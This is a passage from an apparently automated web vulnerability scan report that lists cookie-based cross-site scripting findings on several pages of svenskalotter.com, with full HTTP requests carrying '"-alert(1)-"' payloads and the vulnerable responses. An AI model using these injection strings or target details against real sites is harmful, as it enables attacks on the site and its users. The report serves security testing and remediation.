GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM7cec3"-alert(1)-"c018451af4e; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: BO=FM7cec3"-alert(1)-"c018451af4e; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:23 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7cec3"-alert(1)-"c018451af4e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.427. http://www.svenskalotter.com/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4230c"-alert(1)-"197708d1428 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM4230c"-alert(1)-"197708d1428; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM4230c"-alert(1)-"197708d1428; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:12 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM4230c"-alert(1)-"197708d1428";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.428. http://www.svenskalotter.com/AboutUs.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/AboutUs.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2ded"-alert(1)-"175d0560975 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMd2ded"-alert(1)-"175d0560975; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: BO=FMd2ded"-alert(1)-"175d0560975; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:28 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMd2ded"-alert(1)-"175d0560975";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.429. http://www.svenskalotter.com/AboutUs.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/AboutUs.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f308"-alert(1)-"412c887e86b was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM1f308"-alert(1)-"412c887e86b; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1f308"-alert(1)-"412c887e86b; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:16 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1f308"-alert(1)-"412c887e86b";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.430. http://www.svenskalotter.com/Affiliates.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Affiliates.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c29"-alert(1)-"6e0a70727e3 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb9c29"-alert(1)-"6e0a70727e3; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: BO=FMb9c29"-alert(1)-"6e0a70727e3; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:35 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb9c29"-alert(1)-"6e0a70727e3";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.431. http://www.svenskalotter.com/Affiliates.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Affiliates.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44017"-alert(1)-"cadece065c0 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM44017"-alert(1)-"cadece065c0; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM44017"-alert(1)-"cadece065c0; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:22 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM44017"-alert(1)-"cadece065c0";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.432. http://www.svenskalotter.com/Charity.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Charity.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc1a2"-alert(1)-"ba279956fa6 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMcc1a2"-alert(1)-"ba279956fa6; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: BO=FMcc1a2"-alert(1)-"ba279956fa6; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:26 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMcc1a2"-alert(1)-"ba279956fa6";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.433. http://www.svenskalotter.com/Charity.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/Charity.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd193"-alert(1)-"6cdf693f8ec was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PMbd193"-alert(1)-"6cdf693f8ec; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMbd193"-alert(1)-"6cdf693f8ec; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:15 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMbd193"-alert(1)-"6cdf693f8ec";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.434. http://www.svenskalotter.com/ContactUsMail.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c7ef"-alert(1)-"ff3f13efa1c was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM9c7ef"-alert(1)-"ff3f13efa1c; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: BO=FM9c7ef"-alert(1)-"ff3f13efa1c; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:31 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM9c7ef"-alert(1)-"ff3f13efa1c";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.435. http://www.svenskalotter.com/ContactUsMail.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eba4"-alert(1)-"95b86ca0225 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM5eba4"-alert(1)-"95b86ca0225; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM5eba4"-alert(1)-"95b86ca0225; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:37:19 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM5eba4"-alert(1)-"95b86ca0225";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.436. http://www.svenskalotter.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.svenskalotter.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbe0e"-alert(1)-"725dc4c31b8 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
